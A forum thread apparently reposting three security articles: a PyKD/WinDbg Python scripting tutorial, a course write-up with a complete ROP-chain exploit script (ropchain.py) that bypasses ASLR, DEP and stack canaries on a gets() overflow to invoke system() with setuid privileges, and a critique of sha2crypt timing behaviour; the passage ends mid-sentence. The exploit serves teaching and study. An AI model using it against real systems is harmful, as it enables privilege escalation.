  9. PyKD Tutorial – part 1 Published May 25, 2018 by Sιиα K. 0 Using windbg script syntax is such annoying thing that almost all reverse engineers have problems dealing with it but automating debugging gives such a power that can’t be easily ignored. A good solution to solve this problem is using the power and simplicity of Python and Windbg together. If you aware, Windbg also supports c-like binaries as extensions so there is a praiseworthy tool called PyKD which does the hard thing and connects Python and Windbg together in a straight and usable way. The purpose of PyKD, as they mentioned, is : This project can help to automate debugging and crash dump analysis using Python. It allows one to take the best from both worlds: the expressiveness and convenience of Python with the power of WinDbg! You can download PyKD at this link. Setup PyKD To find the main extension binary files, you should find the latest version of the Bootstrapper and download its x86 and x64 versions depending to your needs, after extracting the binary files (pykd.dll) you should load it in Windbg with the following command : .load C:\Users\Sina\Desktop\pykd\x64\pykd.dll 1 .load C:\Users\Sina\Desktop\pykd\x64\pykd.dll In order to see if it successfully loaded or not, you should execute the following command, if you see something like this, then you’re good to go. 0:000> !help usage: !help print this text !info list installed python interpreters !select version change default version of a python interpreter !py [version] [options] [file] run python script or REPL Version: -2 : use Python2 -2.x : use Python2.x -3 : use Python3 -3.x : use Python3.x Options: -g --global : run code in the common namespace -l --local : run code in the isolated namespace -m --module : run module as the __main__ module ( see the python command line option -m ) command samples: "!py" : run REPL "!py --local" : run REPL in the isolated namespace "!py -g script.py 10 "string"" : run a script file with an argument in the commom namespace "!py -m module_name" : run a named module as the __main__ !pip [version] [args] run pip package manager Version: -2 : use Python2 -2.x : use Python2.x -3 : use Python3 -3.x : use Python3.x pip command samples: "pip list" : show all installed packagies "pip install pykd" : install pykd "pip install --upgrade pykd" : upgrade pykd to the latest version "pip show pykd" : show info about pykd package 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 0:000> !help usage: !help print this text !info list installed python interpreters !select version change default version of a python interpreter !py [version] [options] [file] run python script or REPL Version: -2 : use Python2 -2.x : use Python2.x -3 : use Python3 -3.x : use Python3.x Options: -g --global : run code in the common namespace -l --local : run code in the isolated namespace -m --module : run module as the __main__ module ( see the python command line option -m ) command samples: "!py" : run REPL "!py --local" : run REPL in the isolated namespace "!py -g script.py 10 "string"" : run a script file with an argument in the commom namespace "!py -m module_name" : run a named module as the __main__ !pip [version] [args] run pip package manager Version: -2 : use Python2 -2.x : use Python2.x -3 : use Python3 -3.x : use Python3.x pip command samples: "pip list" : show all installed packagies "pip install pykd" : install pykd "pip install --upgrade pykd" : upgrade pykd to the latest version "pip show pykd" : show info about pykd package If you saw the above command suggestions, one of the interesting commands which can be used to update the PyKD is : !pip install --upgrade pykd 1 !pip install --upgrade pykd But actually, I prefer to compile the latest version from its source code rather than updating or using the PyKD.dll directly. That’s enough for the setting up and starting, in the rest of the post, we’re getting started with some useful samples of using PyKD. But the right way to get PyKD is to download its latest release and then find a file named “pykd.pyd” among other DLL files then load .pyd file. Using PyKD Features This section describes the general functions of PyKD. Executing Command The simplest thing is using the PyKD to execute and get the command result, it can be done using the following script in which r is our command and we simply print the result. You can also assign the results to a variable and separate them using Python’s regular string function. import pykd print pykd.dbgCommand("r") 1 2 3 import pykd print pykd.dbgCommand("r") You should save the above script into a file (e.g pykd-script.py) then load it in Windbg using the following command : 0:000> !py c:\users\Sina\desktop\pykd-script.py rax=0000000000000000 rbx=0000000000000010 rcx=00007fffd3d5a434 rdx=0000000000000000 rsi=00007fffd3de4090 rdi=00007fffd3de4740 rip=00007fffd3d8d02c rsp=0000000b419ef3b0 rbp=0000000000000000 r8=0000000b419ef3a8 r9=0000000000000000 r10=0000000000000000 r11=0000000000000246 r12=0000000000000040 r13=0000000000000000 r14=0000000b41a63000 r15=000001d8da130000 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!LdrInitShimEngineDynamic+0x34c: 00007fff`d3d8d02c cc int 3 1 2 3 4 5 6 7 8 9 10 11 0:000> !py c:\users\Sina\desktop\pykd-script.py rax=0000000000000000 rbx=0000000000000010 rcx=00007fffd3d5a434 rdx=0000000000000000 rsi=00007fffd3de4090 rdi=00007fffd3de4740 rip=00007fffd3d8d02c rsp=0000000b419ef3b0 rbp=0000000000000000 r8=0000000b419ef3a8 r9=0000000000000000 r10=0000000000000000 r11=0000000000000246 r12=0000000000000040 r13=0000000000000000 r14=0000000b41a63000 r15=000001d8da130000 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!LdrInitShimEngineDynamic+0x34c: 00007fff`d3d8d02c cc int 3 As you see the registers’ value is shown above, I usually use these kinds of scripts with t (step in) and p (step) to simulate an instrumenting environment and check what is going on (e.g a combination of instructions and registers’ value and its corresponding memory values.) even though this operation is too slow but still usable for special cases. Getting Registers value A better way of getting registers is using the following sample : import pykd addr = hex(pykd.reg("rsp")) print(addr) 1 2 3 4 5 import pykd addr = hex(pykd.reg("rsp")) print(addr) Continue to run The following command is the equivalent of go in PyKD : pykd.go() 1 pykd.go() Read the content of the memory To read the contents of a special virtual address you should use something like this : import pykd addr = pykd.reg("rip") value = pykd.loadBytes(addr,16) print(value) 1 2 3 4 5 6 import pykd addr = pykd.reg("rip") value = pykd.loadBytes(addr,16) print(value) The result is : 0:010> !py c:\users\Sina\desktop\pykd-script.py [204, 195, 204, 204, 204, 204, 204, 204, 15, 31, 132, 0, 0, 0, 0, 0] 1 2 0:010> !py c:\users\Sina\desktop\pykd-script.py [204, 195, 204, 204, 204, 204, 204, 204, 15, 31, 132, 0, 0, 0, 0, 0] The other variants of Load functions are loadAnsiString,loadBytes,loadCStr,loadChars,loadDWords,loadDoubles and etc. Comparing Memory The following script returns true if the contents of memory in two virtual addresses are equal otherwise the result is false. import pykd addr1 = 0x00007fffd3d31596 addr2 = 0x00007fffd3d31597 result = pykd.compareMemory(addr1,addr2,100) print(result) 1 2 3 4 5 6 import pykd addr1 = 0x00007fffd3d31596 addr2 = 0x00007fffd3d31597 result = pykd.compareMemory(addr1,addr2,100) print(result) Detach As the documentation suggests, pykd.detachAllProcesses() ===> Detach from all process and resume all their threads 1 pykd.detachAllProcesses() ===> Detach from all process and resume all their threads & pykd.detachProcess() ===> Stop process debugging 1 pykd.detachProcess() ===> Stop process debugging Find Nearest Valid Memory Location The following script gives the nearest valid memory location, near to 0x0. import pykd result = pykd.findMemoryRegion(0x0) print(hex(result[0])) 1 2 3 4 5 import pykd result = pykd.findMemoryRegion(0x0) print(hex(result[0])) The result is : 0:003> !py c:\users\Sina\desktop\pykd-script.py 0x5d670000 0:003> dc 0x5d670000 00000000`5d670000 00905a4d 00000003 00000004 0000ffff MZ.............. 00000000`5d670010 000000b8 00000000 00000040 00000000 ........@....... 00000000`5d670020 00000000 00000000 00000000 00000000 ................ 00000000`5d670030 00000000 00000000 00000000 00000128 ............(... 00000000`5d670040 0eba1f0e cd09b400 4c01b821 685421cd ........!..L.!Th 00000000`5d670050 70207369 72676f72 63206d61 6f6e6e61 is program canno 00000000`5d670060 65622074 6e757220 206e6920 20534f44 t be run in DOS 00000000`5d670070 65646f6d 0a0d0d2e 00000024 00000000 mode....$....... 1 2 3 4 5 6 7 8 9 10 11 0:003> !py c:\users\Sina\desktop\pykd-script.py 0x5d670000 0:003> dc 0x5d670000 00000000`5d670000 00905a4d 00000003 00000004 0000ffff MZ.............. 00000000`5d670010 000000b8 00000000 00000040 00000000 ........@....... 00000000`5d670020 00000000 00000000 00000000 00000000 ................ 00000000`5d670030 00000000 00000000 00000000 00000128 ............(... 00000000`5d670040 0eba1f0e cd09b400 4c01b821 685421cd ........!..L.!Th 00000000`5d670050 70207369 72676f72 63206d61 6f6e6e61 is program canno 00000000`5d670060 65622074 6e757220 206e6920 20534f44 t be run in DOS 00000000`5d670070 65646f6d 0a0d0d2e 00000024 00000000 mode....$....... Finding Function Name If you want to find the what function is located at a special address based on symbols, you should use findSymbol. import pykd result = pykd.findSymbol(0x00007fffd3d5d960) print(result) 1 2 3 4 5 import pykd result = pykd.findSymbol(0x00007fffd3d5d960) print(result) The result is : 0:003> !py c:\users\Sina\desktop\pykd-script.py ntdll!DbgBreakPoint 1 2 0:003> !py c:\users\Sina\desktop\pykd-script.py ntdll!DbgBreakPoint Get Current Stack Frame import pykd result = pykd.getFrame() print(result) 1 2 3 4 5 import pykd result = pykd.getFrame() print(result) The result is : 0:003> !py c:\users\Sina\desktop\pykd-script.py Frame: IP=7fffd3d5d960 Return=7fffd3d89bbb Frame Offset=b41effa70 Stack Offset=b41effa78 0:003> dc rsp 0000000b`41effa78 d3d89bbb 00007fff 00000000 00000000 ................ 0000000b`41effa88 00000000 00000000 00000000 00000000 ................ 0000000b`41effa98 00000000 00000000 00000000 00000000 ................ 0000000b`41effaa8 d18e3034 00007fff 00000000 00000000 40.............. 0000000b`41effab8 00000000 00000000 00000000 00000000 ................ 0000000b`41effac8 00000000 00000000 00000000 00000000 ................ 0000000b`41effad8 d3d31551 00007fff 00000000 00000000 Q............... 0000000b`41effae8 00000000 00000000 00000000 00000000 ................ 1 2 3 4 5 6 7 8 9 10 11 0:003> !py c:\users\Sina\desktop\pykd-script.py Frame: IP=7fffd3d5d960 Return=7fffd3d89bbb Frame Offset=b41effa70 Stack Offset=b41effa78 0:003> dc rsp 0000000b`41effa78 d3d89bbb 00007fff 00000000 00000000 ................ 0000000b`41effa88 00000000 00000000 00000000 00000000 ................ 0000000b`41effa98 00000000 00000000 00000000 00000000 ................ 0000000b`41effaa8 d18e3034 00007fff 00000000 00000000 40.............. 0000000b`41effab8 00000000 00000000 00000000 00000000 ................ 0000000b`41effac8 00000000 00000000 00000000 00000000 ................ 0000000b`41effad8 d3d31551 00007fff 00000000 00000000 Q............... 0000000b`41effae8 00000000 00000000 00000000 00000000 ................ pykd.getStack() also gives a list of stack frame objects. Last Exception import pykd result = pykd.getLastException() print(result) 1 2 3 4 5 import pykd result = pykd.getLastException() print(result) The result is : 0:003> !py c:\users\Sina\desktop\pykd-script.py FirstChance= True ExceptionCode= 0x80000003 ExceptionFlags= 0x0 ExceptionRecord= 0x0 ExceptionAddress= 0x7fffd3d5d960 Param[0]= 0x0 1 2 3 4 5 6 7 0:003> !py c:\users\Sina\desktop\pykd-script.py FirstChance= True ExceptionCode= 0x80000003 ExceptionFlags= 0x0 ExceptionRecord= 0x0 ExceptionAddress= 0x7fffd3d5d960 Param[0]= 0x0 Finding Function Location To get where a special function located you can use the following code : It’s like executing x KERNEL32!CreateFileW in Windbg command-line. import pykd result = pykd.getOffset("KERNEL32!CreateFileW") print(result) 1 2 3 4 5 import pykd result = pykd.getOffset("KERNEL32!CreateFileW") print(result) The result is : 0:003> !py c:\users\Sina\desktop\pykd-script.py 0x7fffd18f0940L 0:003> x kernel32!CreateFileW 00007fff`d18f0940 KERNEL32!CreateFileW (<no parameter info>) 1 2 3 4 5 0:003> !py c:\users\Sina\desktop\pykd-script.py 0x7fffd18f0940L 0:003> x kernel32!CreateFileW 00007fff`d18f0940 KERNEL32!CreateFileW (<no parameter info>) Get System Version import pykd result = pykd.getSystemVersion() print(result) 1 2 3 4 5 import pykd result = pykd.getSystemVersion() print(result) example result : 0:003> !py c:\users\Sina\desktop\pykd-script.py Major Version: 10 Minor Version: 0 Build: 17134 Description: 17134.1.amd64fre.rs4_release.180410-1804 1 2 3 4 5 0:003> !py c:\users\Sina\desktop\pykd-script.py Major Version: 10 Minor Version: 0 Build: 17134 Description: 17134.1.amd64fre.rs4_release.180410-1804 Getting Page Attributes One of the important functions of PyKD is getting the page attributes. import pykd addr1 = pykd.reg("rip") result = pykd.getVaProtect(addr1) print("RIP Attributes : " + str(result)) addr2 = pykd.reg("rsp") result = pykd.getVaProtect(addr2) print("RSP Attributes : " + str(result)) 1 2 3 4 5 6 7 8 9 10 11 12 13 import pykd addr1 = pykd.reg("rip") result = pykd.getVaProtect(addr1) print("RIP Attributes : " + str(result)) addr2 = pykd.reg("rsp") result = pykd.getVaProtect(addr2) print("RSP Attributes : " + str(result)) The result is : 0:003> !py c:\users\Sina\desktop\pykd-script.py RIP Attributes : PageExecuteRead RSP Attributes : PageReadWrite 1 2 3 0:003> !py c:\users\Sina\desktop\pykd-script.py RIP Attributes : PageExecuteRead RSP Attributes : PageReadWrite There is also an important function called isValid which can be used to detect whether a virtual address is valid or not. Reading and writing MSR Register If you are in a kernel debugging, you could read MSR registers using pykd.rdmsr(value). import pykd result = pykd.rdmsr(0x80000082) print(result) 1 2 3 4 5 import pykd result = pykd.rdmsr(0x80000082) print(result) To write on a specific MSR you can use pykd.wrmsr(Address, Value). That’s enough for now, I’ll write the rest of this post another time in part 2, so make sure check blog more frequently. ? The second part is also published here! Sursa: https://rayanfam.com/topics/pykd-tutorial-part1/
  10. ropchain I’m going to show you how to do Project 1 Question 1 while ASLR+DEP+stack canaries are enabled. As a reminder, here’s how the code looks: void deja_vu() { char door[8]; gets(door); } int main() { deja_vu(); } A Chinese translation of this article is available here. ASLR and DEP We will start by defeating ASLR and DEP. The text segment of our dejavu binary will not be randomized, since it is not a position-independent executable. This means we can get around both defenses with a return oriented programming chain. Our solution is broken up into many different steps: Put the address of the system function from libc onto the stack. Put the address of the string "s/kernel/rtsig-max" onto the stack (but possibly far from system). Align the stack pointer to point to "s/kernel/rtsig-max". Align edx to point to &system. Call [edx]. This is equivalent to system("s/kernel/rtsig-max"), which executes an attacker-controlled binary with setuid privileges. The string "s/kernel/rtsig-max" is mostly arbitrary, any string contained in libc which can be treated as a relative Linux path and ends whose address ends in a NUL byte is a valid target. It’s possible to get the string "/bin/sh" on the stack instead, but that makes our attack more complicated. Return Oriented Programming Primer The idea behind return oriented programming is that you place the addresses of “gadgets” onto the stack. These gadgets do some (usually small) operation, and then call ret. Once we ret, that pops the address of the next gadget off the stack and jumps to that address. Our goal is to chain these small gadgets together in order to achieve arbitrary code execution. Effectively, we can think of ROP as letting us jump to any series of addresses we want, as long as the calls doesn’t mess up our stack. Usual suspects for messing up the stack is a leave or anything which changes esp by a lot. There are tools to help find gadgets within executables. This is useful, because sometimes gadgets can even be hidden inside other instructions! Let’s run ROPgadget to see what sort of gadgets we have. $ python ROPgadget.py --binary ../dejavu --badbytes 0a # ... Unique gadgets found: 86 We set a “bad byte” of 0x0a since we know that our gets function cannot write a newline. (It can write NUL bytes.) While we have a bunch of gadgets, most of them suck. Here are the few that we plan to use: 0x0804841c : dec ecx ; ret 0x0804835e : add dh, bl ; ret 0x0804857b : call dword ptr [edx] 0x080482d2 : pop ebx ; ret 0x080482bb : ret Note that the last of these gadgets is effectively a return oriented programming NOP: it just moves the esp up 4 bytes to access the next return address. We’ll see later why it is useful. The Attack We will need to reference the disassembly quite often. Here is the disassembly of the dejavu program, excluding libc parts. deja_vu: 0x0804840c <+0>: push ebp 0x0804840d <+1>: mov ebp,esp 0x0804840f <+3>: sub esp,0x28 0x08048412 <+6>: lea eax,[ebp-0x10] 0x08048415 <+9>: mov DWORD PTR [esp],eax 0x08048418 <+12>: call 0x80482f0 <gets@plt> 0x0804841d <+17>: leave 0x0804841e <+18>: ret main: 0x0804841f <+0>: push ebp 0x08048420 <+1>: mov ebp,esp 0x08048422 <+3>: and esp,0xfffffff0 0x08048425 <+6>: call 0x804840c <deja_vu> 0x0804842a <+11>: mov eax,0x0 0x0804842f <+16>: leave 0x08048430 <+17>: ret Let’s take a look at the stack layout at deja_vu+18 (right before we ret from the function). It looks something like this: /---------------------\ | . . . | | saved return addr. | <--- esp | . . . | | door | <--- eax, edx | . . . | | . . . | | . . . | | libc_end | <--- ecx | . . . | | system | <--- we want this | . . . | | libc_start | <--- ebx | . . . | | . . . | | . . . | | dejavu .text | \---------------------/ Even though libc’s position in code is randomized, ebx and ecx effectively “leak” information about its location. This is a result of the dynamic loader resolving the call to gets@plt. How this occurs is a little complicated, so let’s take it for granted. While the address of libc is randomized by ASLR, the offset of things within libc is not. For example, the system function is always at 0x168494 bytes before libc_end. We want to call this function, so we need to decrease ecx by 0x168494. How can we decrease ecx? We do have a promising gadget which decrements ecx by 1: 0x0804841c : dec ecx ; ret We would need to call this gadget 0x168494 times to get the address of system. (There are no other useful gadgets for either ecx or ebx.) Our available stack space is an order of magnitude less. However, we can use the following trick: we return to main. Because gcc aligns the stack at 16 bytes intervals, we will gain stack space every time we call main. The picture below illustrates the scenario right before main+3 executes: /---------------------\ | . . . | | 4 bytes | <--- old esp | sfp | <--- esp, ebp | 4 bytes | | 4 bytes | | 4 bytes | <--- esp & 0xfffffff0 | . . . | \---------------------/ After we call main, our program continues to call deja_vu. This gives us another opportunity to do a buffer overflow to gain more stack space. By repeating this method a bunch of times, we can get enough stack space to do 0x168494 decrements. We need to perform all the decrements at once since our value for ecx gets overwritten every time gets is called. We perform the same method in order to get the address of "s/kernel/rtsig-max" onto the stack. Once we have ecx pointing to system, we now need to call the address. There is a call gadget call dword ptr [edx]. So we need some way to get the address of the value of ecx into edx. The only place where we have the opportunity to put ecx on the stack is a push ecx in _start. The _start function is called by the operating system before main and effectively loads libc which then begins the main program. _start: 0x08048320 <+0>: xor ebp,ebp 0x08048322 <+2>: pop esi 0x08048323 <+3>: mov ecx,esp 0x08048325 <+5>: and esp,0xfffffff0 0x08048328 <+8>: push eax 0x08048329 <+9>: push esp 0x0804832a <+10>: push edx 0x0804832b <+11>: push 0x80484b0 0x08048330 <+16>: push 0x8048440 0x08048335 <+21>: push ecx 0x08048336 <+22>: push esi 0x08048337 <+23>: push 0x804841f 0x0804833c <+28>: call 0x8048310 <__libc_start_main@plt> 0x08048341 <+33>: hlt In order to have the program run correctly and to push ecx on the stack, we need to jump to _start+9. We could actually jump to anywhere between _start+5 and _start+11, but this will mess up our stack alignment later on. Recall that the return value of gets is stored in edx. We can use some arithmetic in order to get that edx to point one of the system calls. We do have a gadget which involves arithmetic using edx and ebx: 0x0804835e : add dh, bl ; ret If you need a reminder of how x86 registers work, look at the following diagram. /------------------------\ | edx | | | dx | | | dh | dl | \------------------------/ The register edx refers to the whole 32-bit register. The register dx refers to the lower 16-bits of the register. dh and dl refer to the two 8-bit halves of the lower 16-bits. So this gadget lets us change the middle bits of edx however we want. Note we can’t “overflow” dh into the top half of the register, so we cannot actually affect the top bits of edx. There is also a gadget letting us pop into ebx, so we completely control bl. We can load any value we want into ebx by putting it on the stack and then letting it get popped into the register. However this only lets us affect the second least significant byte of edx. Since edx is also the address of the door buffer, we can also change door and also edx by changing our stack pointer. Therefore we can use the same stack trick of returning to main in order to align edx with the address of system. Now we need to align our stack pointer with our executable string so that we can use it as an argument to system. We simply use a ROP NOP (similar to a ret2ret chain): 0x080482bb : ret After a few NOPs, we have that our stack pointer is nearly at the right spot. We finish our ROP chain with the previously mentioned call dword ptr [edx]. gets also terminates this with a NUL byte, which overwrites the LSB of the executable string address. (This is why we chose a string whose LSB was already 0x00.) Now we are in a ret2libc scenario: we are calling system with a pointer to a string on the stack. This runs the program as uid brown, which allows us to do whatever we want. Stack Canaries Let’s say that we also add stack canaries. How much more difficult does this make our exploit? Debian systems always set the least significant byte of the canary to 0x00, and so we only have 24 bits of entropy. We stay with the constant guess of 0x41414100 as the stack canary, and simply keep running until we get that. An efficient C program using syscalls can get on the order of 2500 tries per second. Based on this, we can estimate that our program will take approximately 1.2 hours to crack the canary. Closing Thoughts The final ropchain is listed in ropchain.py below. The code can be modified to create the necessary directories and executable automatically, and to work when stack canaries are enabled. #!/usr/bin/env python2 # ropchain.py from struct import pack p = lambda n: pack("<I", n) sc = [] PAD = 'A' * 20 DEC_ECX = p(0x0804841c) RET_MAIN = p(0x0804841f) RET_START = p(0x08048320 + 9) POP_EBX = p(0x080482d2) ADD_DH_BL = p(0x0804835e) CALL_STAR_EDX = p(0x0804857b) ROP_NOP = p(0x080482bb) NEWLINE = '\n' GET_16B = PAD + RET_MAIN + NEWLINE OFFSET_BINARY = 0x450c4 OFFSET_SYSTEM = 0x168494 def load_libc_address(offset): sc.extend([GET_16B] * ((offset + 3) / 4)) sc.append(PAD) sc.extend([DEC_ECX] * offset) sc.append(RET_START) sc.append(NEWLINE) load_libc_address(OFFSET_SYSTEM) load_libc_address(OFFSET_BINARY) sc.extend([GET_16B] * 3) sc.append(PAD + POP_EBX + p(1)) sc.append(ADD_DH_BL) sc.extend([ROP_NOP] * 15) sc.append(CALL_STAR_EDX) sc.append(NEWLINE) print(''.join(sc)) Sursa: http://www.kvakil.me/posts/ropchain/
  11. Do Not Use sha256crypt / sha512crypt - They're Dangerous Introduction I'd like to demonstrate why I think using sha256crypt or sha512crypt on current GNU/Linux operating systems is dangerous, and why I think the developers of GLIBC should move to scrypt or Argon2, or at least bcrypt or PBKDF2. History and md5crypt In 1994, Poul-Henning Kamp (PHK) added md5crypt to FreeBSD to address the weaknesses of DES-crypt that was common on the Unix and BSD systems of the early 1990s. DES-Crypt has a core flaw in that, not only DES reversible (which necessarily isn't a problem here), and incredibly fast, but it also limited password length to 8 characters (each of those limited to 7-bit ASCII to create a 56-bit DES key). When PHK created md5crypt, one of the things he made sure to implement as a feature was to support arbitrary-length passwords. In other words, unlike DES-Crypt, a user could have passwords greater than 9 or more characters. This was "good enough" for 1994, but it had an interesting feature that I don't think PHK thought of at the time- md5crypt execution time is dependent on password length. To prove this, I wrote a simple Python script using passlib to hash passwords with md5crypt. I started with a single "a" character as my password, then increased the password length by appending more "a"s up until the password was 4,096 "a"s total. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import time from passlib.hash import md5_crypt md5_results = [None] * 4096 for i in xrange(0, 4096): print i, pw = "a" * (i+1) start = time.clock() md5_crypt.hash(pw) end = time.clock() md5_results[i] = end - start with open("md5crypt.txt", "w") as f: for i in xrange(0, 4096): f.write("{0} {1}\n".format(i+1, md5_results[i])) Nothing fancy. Start the timer, hash one "a" with md5crypt, stop the timer, and record the results. Start the timer, hash two "a"s with md5crypt, stop the timer, and record the results. Wash, rinse, repeat, until the password is 4,096 "a"s in length. What do the timing results look like? Below are scatter plots of timing md5crypt for passwords of 1-128, 1-512, and 1-4,096 characters in length: md5crypt 1-128 characters md5crypt 1-512 characters md5crypt 1-4,096 characters At first, you wouldn't think this is a big deal; in fact, you may even think you LIKE it (we're supposed to make things get slower, right? That's a good thing, right???). But, upon deeper inspection, this actually is a flaw in the algorithm's design for two reasons: Long passwords can create a denial-of-service on the CPU (larger concern). Passive observation of execution times can predict password length (smaller concern). Now, to be fair, predicting password length based on execution time is ... meh. Let's be honest, the bulk of passwords will be between 7-10 characters. And because these algorithms operate in block sizes of 16, 32, or 64 bytes, an adversary learning "AHA! I know your password is between 1-16 characters" really isn't saying much. But, should this even exist in a cryptographic primitive? Probably not. Still, the larger concern would be users creating a DoS on the CPU, strictly by changing password length. I know what you're thinking- it's 2018, so there should be no reason why any practical length password cannot be adequately hashed with md5crypt insanely quickly, and you're right. Except, md5crypt was invented in 1994, 24 years ago. According to PHK, he designed it to take about 36 milliseconds on the hardware he was testing, which would mean a speed about 28 per second. So, it doesn't take much to see that by increasing the password's length, you can increase execution time enough to affect a busy authentication server. The question though, is why? Why is the execution time dependent on password length? This is because md5crypt processes the hash for every 16 bytes in the password. As a result, this creates the stepping behavior you see in the scatter plots above. A good password hashing design would not do this. PHK eventually sunset md5crypt in 2012 with CVE-2012-3287. Jeremi Gosney, a professional password cracker, demonstrated with Hashcat and 8 clustered Nvidia GTX 1080Ti GPUS, that a password cracker could rip through 128.4 million md5crypt guesses per second. You should no longer be implementing md5crypt for your password hashing. sha2crypt and NIH syndrome In 2007, Ulrich Drepper decided to improve things for GNU/Linux. He recognized the threat that GPU clusters, and even ASICs, posed on fast password cracking with md5crypt. One aspect of md5crypt was the hard-coded 1,000 iterations spent on the CPU, before the password hash was finalized. This cost was not configurable. Also, MD5 was already considered broken, with SHA-1 showing severe weaknesses, so he moved to SHA-2 for the core of his design. The first thing addressed, was to make the cost configurable, so as hardware improved, you could increase the iteration count, thus keeping the cost for calculating the final hash expensive for password crackers. However, he also made a couple core changes to his design that differed from md5crypt, which ended up having some rather drastic effects on its execution. Using code similar to above with Python's passlib, but rather using the sha256_crypt() and sha512_crypt() functions, we can create scatter plots of sha256crypt and sha512crypt for passwords up to 128-characters, 512-characters, and 4,096-characters total, just like we did weth md5crypt. How do they fall out? Take a look: sha256crypt 1-128 characters sha256crypt 1-512 characters sha256crypt 1-4,096 characters sha512crypt 1-128 characters sha512crypt 1-512 characters sha512crypt 1-4,096 characters Curious. Not only do we see the same increasing execution time based on password length, but unlike md5crypt, that growth is polynomial. The changes Ulrich Drepper made from md5crypt are subtle, but critical. Essentially, not only do we process the hash for every character in the password per round, like md5crypt, but we process every character in the password three more times. First, we take the binary representation of each bit in the password, and update the hash based on if we see a "1" or a "0". Second, for every character in the password, we update the hash. Finally, again, for every character in the password, we update the hash. For those familiar with big-O notation, we end up with an execution run time of O(pw_length2 + pw_length*iterations). Now, while it is true that we want our password hashing functions to be slow, we also want the iterative cost to be the driving factor in that decision, but that isn't the case with md5crypt, and it's not the case with sha256crypt nor sha512crypt. In all three cases, the password length is the driving factor in the execution time, not the iteration count. Again, why is this a problem? To remind you: Long passwords can create a denial-of-service on the CPU (larger concern). Passive observation of execution times can predict password length (smaller concern). Now, granted, in practice, people aren't carrying around 4 kilobyte passwords. If you are a web service provider, you probably don't want people uploading 5 gigabyte "passwords" to your service, creating a network denial of service. So you would probably be interested in creating an adequate password maximum, such as what NIST recommends at 128 characters, to prevent that from occurring. However, if you have an adequate iterative cost (such as say, 640,000 rounds), then even moderately large passwords from staff, where such limits may not be imposed, could create a CPU denial of service on busy authentication servers. As with md5crypt, we don't want this. Now, here's what I find odd about Ulrich Drepper, and his design. In his post, he says about his specification (emphasis mine): Well, there is a problem. I can already hear everybody complaining that I suffer from the NIH syndrome but this is not the reason. The same people who object to MD5 make their decisions on what to use also based on NIST guidelines. And Blowfish is not on the lists of the NIST. Therefore bcrypt() does not solve the problem. What is on the list is AES and the various SHA hash functions. Both are viable options. The AES variant can be based upon bcrypt(), the SHA variant could be based on the MD5 variant currently implemented. Since I had to solve the problem and I consider both solutions equally secure I went with the one which involves less code. The solution we use is based on SHA. More precisely, on SHA-256 and SHA-512. PBKDF2 was standardized as an IETF standard in September 2000, a full 7 years before Ulrich Drepper created his password hashing functions. While PBKDF2 as a whole would not be blessed by NIST until 3 years later, in December 2010 in SP 800-132, PBKDF2 can be based on functions that, as he mentioned, were already in the NIST standards. So, just like his special design that is based on SHA-2, PBKDF2 can be based on SHA-2. Where he said "I went with the one which involves less code", he should have gone with PBKDF2, as code had already long since existed in all sorts of cryptographic software, including OpenSSL. This seems to be a very clear case of NIH syndrome. Sure, I understand not wanting to go with bcrypt, as it's not part of the NIST standards . But don't roll your own crypto either, when algorithms already exist for this very purpose, that ARE based on designs that are part of NIST. So, how does PBKDF2-HMAC-SHA512 perform? Using similar Python code with the passlib password hashing library, it was trivial to put together: PBKDF2-HMAC-SHA512 1-128 characters PBKDF2-HMAC-SHA512 1-512 characters PBKDF2-HMAC-SHA512 1-4,096 characters What this clearly demonstrates, is that the only factor driving execution time, is the number of iterations you apply to the password, before delivering the final password hash. This is what you want to achieve, not giving the opportunity for a user to create a denial-of-service based on password length, nor an adversary learn the length of the user's password based on execution time. This is the sort of details that a cryptographer or cryptography expert would pay attention to, as opposed to an end-developer. It's worth pointing out that PBKDF2-HMAC-SHA512 is the default password hashing function for Mac OS X, with a variable cost between 30,000 and 50,000 iterations (typical PBKDF2 default is 1,000). OpenBSD, USENIX, and bcrypt Because Ulrich Drepper brought up bcrypt, it's worth mentioning in this post. First off, let's get something straight- bcrypt IS NOT Blowfish. While it's true that bcrypt is based on Blowfish, they are two completely different cryptographic primitives. bcrypt is a one-way cryptographic password hashing function, where as Blowfish is a two-way 64-bit block symmetric cipher. At the 1999 USENIX conference, Niels Provos and David Mazières, of OpenBSD, introduced bcrypt to the world. They were critical of md5crypt, stating the following (emphasis mine): MD5 crypt hashes the password and salt in a number of different combinations to slow down the evaluation speed. Some steps in the algorithm make it doubtful that the scheme was designed from a cryptographic point of view--for instance, the binary representation of the password length at some point determines which data is hashed, for every zero bit the first byte of the password and for every set bit the first byte of a previous hash computation. PHK was slightly offended by their off-handed remark that cryptography was not his core consideration when designing md5crypt. However, Niels Provos was a graduate student in the Computer Science PhD program at the University of Michigan at the time. By August 2003, he had earned his PhD. Since 1999, bcrypt has withstood the test of time, it has been considered "Best Practice" for hashing passwords, and is still well received today, even though better algorithms exist for hashing passwords. How does bcrypt compare to md5crypt, sha256crypt, and sha512crypt in execution time based on password length? bcrypt 1-128 characters bcrypt 1-512 characters bcrypt 1-4,096 characters Again, we see consistent execution, driven entirely by iteration cost, not by password length. Colin Percival, Tarsnap, and scrypt In May 2009, mathematician Dr. Colin Percival presented to BSDCan'09 about a new adaptive password hashing function called scrypt, that was not only CPU expensive, but RAM expensive as well. The motivation was that even though bcrypt and PBKDF2 are CPU-intensive, FPGAs or ASICs could be built to work through the password hashes much more quickly, due to not requiring much RAM, around 4 KB. By adding a memory cost, in addition to a CPU cost to the password hashing function, we can now require the FPGA and ASIC designers to onboard a specific amount of RAM, thus financially increasing the cost of production. scrypt recommends a default RAM cost of at least 16 MB. I like to think of these expensive functions as "security by obesity". scrypt was initially created as an expensive KDF for his backup service Tarsnap. Tarsnap generates client-side encryption keys, and encrypts your data on the client, before shipping the encrypted payload off to Tarsnap's servers. If at any event your client is lost or stolen, generating the encryption keys requires knowing the password that created them, and attempting to discover that password, just like typical password hashing functions, should be slow. It's now been 9 years as of this post, since Dr. Percival introduced scrypt to the world, and like bcrypt, it has withstood the test of time. It has received, and continues to receive extensive cryptanalysis, is not showing any critical flaws or weaknesses, and as such is among the top choices as a 